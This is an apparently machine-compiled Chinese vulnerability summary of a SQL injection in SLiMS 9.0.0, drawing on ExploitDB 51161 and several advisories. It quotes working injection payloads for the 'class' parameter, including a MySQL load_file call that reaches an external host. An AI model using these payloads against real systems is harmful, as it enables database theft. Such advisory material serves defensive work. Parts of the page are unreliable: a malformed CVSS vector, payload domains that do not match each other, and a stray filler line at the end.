# Senayan 9.0.0 SQL注入漏洞
N/A
是否为 Web 类漏洞: 未知
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|
标题: Senayan Library Management System v9.0.0 - SQL Injection - PHP webapps Exploit -- 🔗来源链接
标签:exploit
神龙速读:
## 关键漏洞信息
### 基本信息
- **EDB-ID:** 51161
- **CVE:** N/A
- **Author:** NU11SECUR1TY
- **Type:** WEBAPPS
- **Platform:** PHP
- **Date:** 2023-03-31
- **Vulnerable App:** Senayan Library Management System v9.0.0
### 漏洞详情
- **Description:**
- 手动插入点 `3` 的 `class` 参数似乎对 SQL 注入攻击易受攻击。
- 使用的负载为:`'+(select load_file('\\\\\\0absu0byc9uwy8ivftx7f6auul0fo5cwfk6at2hr.again.com\\fbe'))+`。该负载在手动插入点 `3` 提交。该负载注入了一个调用 MySQL 的 `load_file` 函数的 SQL 子查询,该函数具有引用外部 URL 的 UNC 文件路径。
- **Reproduce URL:**
- [https://github.com/nu11sc3/Sc3-vulnerable/tree/main/friends](https://github.com/nu11sc3/Sc3-vulnerable/tree/main/friends)
- **Proof and Exploit URL:**
- [http://localhost:5001/sy5wji](http://localhost:5001/sy5wji)
- **Time spent:** `03:00:00`
### 其他信息
- **References:**
- Vendor: [https://slims.web.id/web/](https://slims.web.id/web/)
- Software: [https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip](https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip)
- Advisory/Source: [https://github.com/nu11sc3/Sc3-vulnerable/tree/main/friends](https://github.com/nu11sc3/Sc3-vulnerable/tree/main/friends)
标题: CVE-nu11secur1ty/vendors/slims.web.id/SLIMS-9.0.0/SQLi at main · nu11secur1ty/CVE-nu11secur1ty · GitHub -- 🔗来源链接
标签:technical-description
神龙速读:
## 关键漏洞信息
### 漏洞类型
- SQL注入
### 软件
- SLiMS 9.0.0
### 漏洞描述
The manual insertion `point 3` with the `class` parameter appears to be vulnerable to SQL injection attacks. The payload `'+(select load_file('\\\\0absu0byc9uwy8ivftx7f6auul0fo5cwfka61at2hr.again.com.legend\\')+` was submitted in manual insertion point 3. This payload injects a SQL sub-query that calls MySQL's `load_file` function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.
### 漏洞状态
- HIGH Vulnerability
### Payload示例
```sql
reportView=true&year=2002&class=bbbb''' RLIKE (SELECT (CASE WHEN (2547=2547) THEN 0x626262622 ELSE 0x636363635 END)) AND 'kco'='kco
```
### Reproduce和Exploit
- 提供了相关链接,用于复现和利用漏洞。
### 漏洞发现时间
- 3小时
标题: SLiMS - Senayan Library Management System - Beranda -- 🔗来源链接
标签:product
神龙速读:
从网页截图中可以看到以下关于漏洞的关键信息:
- SLiMS 9 Bulian 版本当前可供下载。
- 提供了 SLiMS 的多个下载选项,包括便携式版本(Portable SLiMS)和源代码。
- 列出了 SLiMS 的系统要求:
- Apache web server 版本 2.4
- MySQL 5.7 或 MariaDB 10.3 或更高版本
- PHP 8.3
- PHP GD 扩展启用
- PHP gettext 扩展启用
- PHP mbstring 扩展启用
- 可选 phpMyAdmin 和 Adminer
虽然这些信息本身并不直接说明存在漏洞,但过时的软件版本或未启用必要的扩展可能会引入安全风险。建议定期更新软件和依赖项,并遵循最佳安全实践。
标题: Senayan Library Management System 9.0.0 - SQL Injection | Advisories | VulnCheck -- 🔗来源链接
标签:third-party-advisory
神龙速读:
从这个网页截图中可以获取到关于漏洞的关键信息如下:
- **漏洞名称**: Senayan Library Management System 9.0.0 - SQL Injection
- **严重性**: High (高)
- **日期**: January 13, 2026
- **受影响的系统**: Senayan Library Management System 9.0.0
- **漏洞类型**: CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
- **CVSSv3.1 评分**: 8.1
- **CVSSv3.1 向量字符串**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/SC:H/CI:H/I:H/A:H
- **风险等级**: S:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
- **参考链接**:
- ExploitDB-51161
- Senayan Library Management System Official Website
- Vulnerability Research Repository
- **发现者**: nu11secur1ty
- **描述**: Senayan Library Management System 9.0.0 在'class'参数中存在SQL注入漏洞,允许攻击者注入恶意SQL查询。攻击者可以通过提交精心设计的有效载荷来操纵数据库查询并潜在地提取敏感信息。
Zaproxy alias impedit expedita quisquam pariatur exercitationem. Nemo rerum eveniet dolores rem quia dignissimos.